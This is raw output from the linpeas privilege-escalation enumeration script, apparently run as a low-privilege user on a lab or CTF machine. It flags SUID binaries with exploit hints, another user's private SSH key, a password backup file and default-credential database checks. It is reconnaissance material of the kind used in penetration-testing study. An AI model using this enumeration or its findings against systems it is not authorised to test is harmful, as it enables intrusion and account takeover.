10.10.0.1 dev eth0 lladdr 02:c8:85:b5:5a:aa REACHABLE
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 10.10.0.1 0.0.0.0 UG 0 0 0 eth0
10.10.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0
[+] Iptables rules
iptables rules Not Found
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#internal-open-ports
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 4788 10.10.131.121:22 10.8.32.129:34902 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::445 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN -
tcp6 0 0 :::8009 :::* LISTEN -
tcp6 0 0 :::139 :::* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
udp 0 0 10.10.255.255:137 0.0.0.0:* -
udp 0 0 10.10.131.121:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 10.10.255.255:138 0.0.0.0:* -
udp 0 0 10.10.131.121:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
[+] Can I sniff with tcpdump?
No
====================================( Users Information )=====================================
[+] My user
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#groups
uid=1001(jan) gid=1001(jan) groups=1001(jan)
[+] Do I have PGP keys?
gpg Not Found
[+] Clipboard or highlighted text?
xsel and xclip Not Found
[+] Testing 'sudo -l' without password & /etc/sudoers
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
[+] Checking /etc/doas.conf
/etc/doas.conf Not Found
[+] Checking Pkexec policy
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
[+] Don forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
[+] Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
[+] Superusers
root:x:0:0:root:/root:/bin/bash
[+] Users with console
jan:x:1001:1001::/home/jan:/bin/bash
kay:x:1000:1000:Kay,,,:/home/kay:/bin/bash
root:x:0:0:root:/root:/bin/bash
[+] Login information
09:15:50 up 35 min, 1 user, load average: 0.01, 0.05, 0.14
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jan pts/0 10.8.32.129 09:15 6.00s 0.02s 0.00s w
kay tty1 Wed Apr 18 09:20 - down (00:05)
reboot system boot 4.4.0-119-generi Tue Apr 17 13:45 - 09:25 (19:39)
kay tty1 Wed Apr 18 09:02 - crash (-19:-16)
reboot system boot 4.4.0-119-generi Tue Apr 17 13:27 - 09:25 (19:58)
kay tty1 Tue Apr 17 13:21 - crash (00:05)
reboot system boot 4.4.0-119-generi Tue Apr 17 13:14 - 09:25 (20:10)
kay tty1 Tue Apr 17 13:05 - down (00:08)
reboot system boot 4.4.0-87-generic Tue Apr 17 13:00 - 13:14 (00:14)
wtmp begins Tue Apr 17 13:00:02 2018
[+] All users
_apt
backup
bin
daemon
dnsmasq
games
gnats
irc
jan
kay
list
lp
lxd
mail
man
messagebus
news
nobody
proxy
root
sshd
sync
syslog
systemd-bus-proxy
systemd-network
systemd-resolve
systemd-timesync
sys
tomcat9
uucp
uuidd
www-data
[+] Password policy
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
===================================( Software Information )===================================
[+] MySQL version
mysql Not Found
[+] MySQL connection using default root/root ........... No
[+] MySQL connection using root/toor ................... No
[+] MySQL connection using root/NOPASS ................. No
[+] Looking for mysql credentials and exec
Not Found
[+] PostgreSQL version and pgadmin credentials
Not Found
[+] PostgreSQL connection to template0 using postgres/NOPASS ........ No
[+] PostgreSQL connection to template1 using postgres/NOPASS ........ No
[+] PostgreSQL connection to template0 using pgsql/NOPASS ........... No
[+] PostgreSQL connection to template1 using pgsql/NOPASS ........... No
[+] Apache server info
Version: Server version: Apache/2.4.18 (Ubuntu)
Server built: 2017-09-18T15:09:02
[+] Looking for PHPCookies
Not Found
[+] Looking for Wordpress wp-config.php files
wp-config.php Not Found
[+] Looking for Tomcat users file
tomcat-users.xml Not Found
[+] Mongo information
Not Found
[+] Looking for supervisord configuration file
supervisord.conf Not Found
[+] Looking for cesi configuration file
cesi.conf Not Found
[+] Looking for Rsyncd config file
/usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
[+] Looking for Hostapd config file
hostapd.conf Not Found
[+] Looking for wifi conns file
Not Found
[+] Looking for Anaconda-ks config files
anaconda-ks.cfg Not Found
[+] Looking for .vnc directories and their passwd files
.vnc Not Found
[+] Looking for ldap directories and their hashes
/etc/ldap
The password hash is from the {SSHA} to 'structural'
[+] Looking for .ovpn files and credentials
.ovpn Not Found
[+] Looking for ssl/ssh files
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
Private SSH keys found!:
/home/kay/.ssh/id_rsa
Looking inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
GSSAPIDelegateCredentials no
[+] Looking for unexpected auth lines in /etc/pam.d/sshd
No
[+] Looking for Cloud credentials (AWS, Azure, GC)
[+] NFS exports?
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
/etc/exports Not Found
[+] Looking for kerberos conf files and tickets
[i] https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt
krb5.conf Not Found
tickets kerberos Not Found
klist Not Found
[+] Looking for Kibana yaml
kibana.yml Not Found
[+] Looking for logstash files
Not Found
[+] Looking for elasticsearch files
Not Found
[+] Looking for Vault-ssh files
vault-ssh-helper.hcl Not Found
[+] Looking for AD cached hahses
/var/lib/samba/private/secrets.tdb
[+] Looking for screen sessions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
No Sockets found in /var/run/screen/S-jan.
[+] Looking for tmux sessions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
tmux Not Found
[+] Looking for Couchdb directory
[+] Looking for redis.conf
[+] Looking for dovecot files
dovecot credentials Not Found
[+] Looking for mosquitto.conf
====================================( Interesting Files )=====================================
[+] SUID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/vim.basic
/usr/bin/pkexec ---> rhel_6/Also_check_groups_privileges_and_pkexec_policy
/usr/bin/newgrp ---> HP-UX_10.20
/usr/bin/chfn ---> SuSE_9.3/10
/usr/bin/sudo ---> /sudo$
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/passwd ---> Apple_Mac_OSX/Solaris/SPARC_8/9/Sun_Solaris_2.5.1_PAM
/bin/su
/bin/ntfs-3g ---> Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others
/bin/ping6
/bin/umount ---> BSD/Linux[1996-08-13]
/bin/fusermount
/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/bin/ping
[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd
/usr/lib/x86_64-linux-gnu/utempter/utempter
/usr/lib/snapd/snap-confine
/usr/bin/crontab
/usr/bin/bsd-write
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/expiry
/usr/bin/wall
/usr/bin/screen ---> GNU_Screen_4.5.0
/usr/bin/at
/usr/bin/mlocate
[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
[+] .sh files in path
/usr/bin/gettext.sh
[+] Files (scripts) in /etc/profile.d/
total 24
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 580 Nov 30 2017 apps-bin-path.sh
-rw-r--r-- 1 root root 663 May 18 2016 bash_completion.sh
-rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh
-rw-r--r-- 1 root root 1557 Apr 14 2016 Z97-byobu.sh
[+] Hashes inside passwd file? ........... No
[+] Can I read shadow files? ........... No
[+] Can I read root folder? ........... No
[+] Looking for root files in home dirs (limit 20)
/home
/home/jan
/home/jan/.lesshst
/home/kay/.viminfo
/home/kay/.lesshst
[+] Looking for root files in folders owned by me
-rw-r--r-- 1 root root 0 Apr 30 09:16 /var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/cgroup.clone_children
-rw-r--r-- 1 root root 0 Apr 30 09:16 /var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/notify_on_release
-rw-r--r-- 1 root root 0 Apr 30 09:16 /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/cgroup.clone_children
-rw-r--r-- 1 root root 0 Apr 30 09:16 /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/notify_on_release
[+] Readable files belonging to root and readable by me but not world readable
[+] Files inside /home/jan (limit 20)
total 12
drwxr-xr-x 2 root root 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 root jan 47 Apr 23 2018 .lesshst
[+] Files inside others home (limit 20)
/home/kay/.profile
/home/kay/.viminfo
/home/kay/.bashrc
/home/kay/.bash_history
/home/kay/.lesshst
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
/home/kay/.bash_logout
/home/kay/.sudo_as_admin_successful
/home/kay/pass.bak
[+] Looking for installed mail applications
[+] Mails (limit 50)
[+] Backup files?
-rw-r--r-- 1 root root 128 Apr 17 2018 /var/lib/sgml-base/supercatalog.old
-rw-r--r-- 1 root root 610 Apr 17 2018 /etc/xml/catalog.old
-rw-r--r-- 1 root root 673 Apr 17 2018 /etc/xml/xml-core.xml.old
-rw-r--r-- 1 root root 9542 Apr 19 2018 /etc/samba/smb.conf.bak
-rwxr-xr-x 1 root root 10504 Mar 14 2016 /usr/bin/tdbbackup.tdbtools
[+] Looking for tables inside readable .db/.sqlite files (limit 100)
-> Extracting tables from /var/lib/nssdb/key4.db (limit 20)
-> Extracting tables from /var/lib/nssdb/secmod.db (limit 20)
-> Extracting tables from /var/lib/nssdb/cert9.db (limit 20)
[+] Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Apr 18 2018 .
drwxr-xr-x 14 root root 4.0K Apr 18 2018 ..
drwxr-xr-x 3 root root 4.0K Apr 23 2018 html
/var/www/html:
total 16K
drwxr-xr-x 3 root root 4.0K Apr 23 2018 .
drwxr-xr-x 3 root root 4.0K Apr 18 2018 ..
[+] *_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .gitconfig, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data
-rw-r--r-- 1 root root 2188 Aug 31 2015 /etc/bash.bashrc
-rw-r--r-- 1 root root 655 May 16 2017 /etc/skel/.profile
-rw-r--r-- 1 root root 3771 Aug 31 2015 /etc/skel/.bashrc
-rw-r--r-- 1 kay kay 655 Apr 17 2018 /home/kay/.profile
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 /home/kay/.bashrc
-rw-r--r-- 1 kay kay 0 Apr 17 2018 /home/kay/.sudo_as_admin_successful
-rw-r--r-- 1 root root 3106 Oct 22 2015 /usr/share/base-files/dot.bashrc
-rw-r--r-- 1 root root 3161 Apr 14 2016 /usr/share/byobu/profiles/bashrc
-rw-r--r-- 1 root root 870 Jul 2 2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/bash.bashrc
-rw-r--r-- 1 root root 1865 Jul 2 2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/skel/dot.bashrc
[+] All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
798117 0 -rw-r--r-- 1 root root 0 Apr 18 2018 /etc/.java/.systemPrefs/.system.lock
798118 0 -rw-r--r-- 1 root root 0 Apr 18 2018 /etc/.java/.systemPrefs/.systemRootModFile
786927 4 -rw-r--r-- 1 root root 220 Aug 31 2015 /etc/skel/.bash_logout
786435 0 -rw------- 1 root root 0 Aug 1 2017 /etc/.pwd.lock
786494 4 -rw-r--r-- 1 root root 1391 Apr 17 2018 /etc/apparmor.d/cache/.features
395 0 -rw-r--r-- 1 root root 0 Apr 30 08:41 /run/network/.ifstate.lock
10038 4 -rw-r--r-- 1 root root 1319 Apr 17 2018 /var/lib/apparmor/profiles/.apparmor.md5sums
532802 4 -rw-r--r-- 1 root root 155 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd
532809 4 -rw-r--r-- 1 root root 333 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.purgatory.ro.cmd
532806 4 -rw-r--r-- 1 root root 1374 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.setup-x86_64.o.cmd
532804 4 -rw-r--r-- 1 root root 1304 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.stack.o.cmd
532798 12 -rw-r--r-- 1 root root 9092 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.sha256.o.cmd
532807 4 -rw-r--r-- 1 root root 3615 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.purgatory.o.cmd
532800 4 -rw-r--r-- 1 root root 1324 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.entry64.o.cmd
532812 4 -rw-r--r-- 1 root root 3529 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.string.o.cmd
532820 4 -rw-r--r-- 1 root root 292 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd
532830 4 -rw-r--r-- 1 root root 292 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd
532821 4 -rw-r--r-- 1 root root 402 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd
532817 4 -rw-r--r-- 1 root root 316 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.unistd_64_x32.h.cmd
532828 4 -rw-r--r-- 1 root root 320 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.unistd_32_ia32.h.cmd
532840 4 -rw-r--r-- 1 root root 320 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd
532838 4 -rw-r--r-- 1 root root 315 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_32.h.cmd
532835 4 -rw-r--r-- 1 root root 340 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_x32.h.cmd
532792 4 -rw-r--r-- 1 root root 146 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs.cmd
532793 4 -rw-r--r-- 1 root root 3342 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_common.o.cmd
532788 4 -rw-r--r-- 1 root root 3362 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_32.o.cmd
532789 4 -rw-r--r-- 1 root root 3362 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_64.o.cmd
532842 56 -rw-r--r-- 1 root root 54037 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/kernel/.asm-offsets.s.cmd
532845 4 -rw-r--r-- 1 root root 22 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.21135.d
532853 4 -rw-r--r-- 1 root root 3972 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.insert-sys-cert.cmd
532910 4 -rw-r--r-- 1 root root 2839 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/selinux/mdp/.mdp.cmd
532908 4 -rw-r--r-- 1 root root 3239 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/selinux/genheaders/.genheaders.cmd
532916 4 -rw-r--r-- 1 root root 1193 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/basic/.bin2c.cmd
532914 8 -rw-r--r-- 1 root root 4268 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/basic/.fixdep.cmd
532869 4 -rw-r--r-- 1 root root 2391 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.conmakehash.cmd
532867 4 -rw-r--r-- 1 root root 3253 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.asn1_compiler.cmd
532857 4 -rw-r--r-- 1 root root 153 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.genksyms.cmd
532862 4 -rw-r--r-- 1 root root 2719 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.genksyms.o.cmd
532866 4 -rw-r--r-- 1 root root 2481 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.parse.tab.o.cmd
532861 4 -rw-r--r-- 1 root root 3347 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.lex.lex.o.cmd
532870 4 -rw-r--r-- 1 root root 3387 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.recordmcount.cmd
532918 8 -rw-r--r-- 1 root root 4495 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.extract-cert.cmd
532919 4 -rw-r--r-- 1 root root 2380 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.kallsyms.cmd
532886 4 -rw-r--r-- 1 root root 3485 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.file2alias.o.cmd
532893 4 -rw-r--r-- 1 root root 104 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.elfconfig.h.cmd
532887 8 -rw-r--r-- 1 root root 4622 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.modpost.o.cmd
532894 8 -rw-r--r-- 1 root root 4451 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.sumversion.o.cmd
532897 8 -rw-r--r-- 1 root root 5191 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.devicetable-offsets.s.cmd
532898 4 -rw-r--r-- 1 root root 2537 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.mk_elfconfig.cmd
532901 4 -rw-r--r-- 1 root root 546 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.devicetable-offsets.h.cmd
532889 4 -rw-r--r-- 1 root root 129 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.modpost.cmd
532896 4 -rw-r--r-- 1 root root 2289 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.empty.o.cmd
532871 8 -rw-r--r-- 1 root root 5133 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.sign-file.cmd
532884 4 -rw-r--r-- 1 root root 3755 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.conf.o.cmd
532883 4 -rw-r--r-- 1 root root 110 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.conf.cmd
532879 8 -rw-r--r-- 1 root root 4917 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.zconf.tab.o.cmd
532872 4 -rw-r--r-- 1 root root 3568 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.sortextable.cmd
532844 188 -rw-r--r-- 1 root root 190243 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.config
535090 188 -rw-r--r-- 1 root root 190367 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.config.old
532847 4 -rw-r--r-- 1 root root 820 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.missing-syscalls.d
535088 16 -rw-r--r-- 1 root root 14210 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/kernel/.bounds.s.cmd
276476 4 -rw-r--r-- 1 root root 155 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd
276482 4 -rw-r--r-- 1 root root 333 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.purgatory.ro.cmd
276488 4 -rw-r--r-- 1 root root 1379 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.setup-x86_64.o.cmd
276485 4 -rw-r--r-- 1 root root 1309 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.stack.o.cmd
276480 12 -rw-r--r-- 1 root root 9148 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.sha256.o.cmd
276484 4 -rw-r--r-- 1 root root 3615 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.purgatory.o.cmd
276487 4 -rw-r--r-- 1 root root 1329 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.entry64.o.cmd
276486 4 -rw-r--r-- 1 root root 3601 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.string.o.cmd
276459 4 -rw-r--r-- 1 root root 292 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd
[+] Readable files inside /tmp, /var/tmp, /var/backups(limit 100)
-rwxr-xr-x 1 jan jan 134167 Apr 30 09:14 /tmp/linpeas.sh
-rw-r--r-- 1 root root 14659 Apr 23 2018 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 1458 Apr 18 2018 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 764 Apr 17 2018 /var/backups/apt.extended_states.2.gz
[+] Interesting writable Files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/mqueue/linpeas.txt
/dev/shm
/run/lock
/run/screen/S-jan
/run/user/1001
/run/user/1001/systemd
/sys/kernel/security/apparmor/.access
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.ns_level
/sys/kernel/security/apparmor/.ns_name
/sys/kernel/security/apparmor/.ns_stacked
/sys/kernel/security/apparmor/policy/.load
/sys/kernel/security/apparmor/policy/.remove
/sys/kernel/security/apparmor/policy/.replace
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.stacked
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/.Test-unix
/tmp/tmux-1001
/tmp/.X11-unix
/tmp/.XIM-unix
/var/crash
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/init.scope/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apache2.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apparmor.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apport.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/console-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-disk-by\x2duuid-db3bdca8\x2d5517\x2d4600\x2db896\x2de8479e05e44a.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-xvda5.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/grub-common.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ifup@eth0.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/iscsid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/keyboard-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/kmod-static-nodes.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-monitor.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxd-containers.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/mdadm.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/-.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/networking.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/nmbd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ondemand.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/open-iscsi.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/polkitd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rc-local.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/resolvconf.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/run-user-1001.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/samba-ad-dc.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/setvtrgb.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/smbd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journal-flush.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-modules-load.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-random-seed.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-remount-fs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-sysctl.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udev-trigger.service/cgroup.event_control
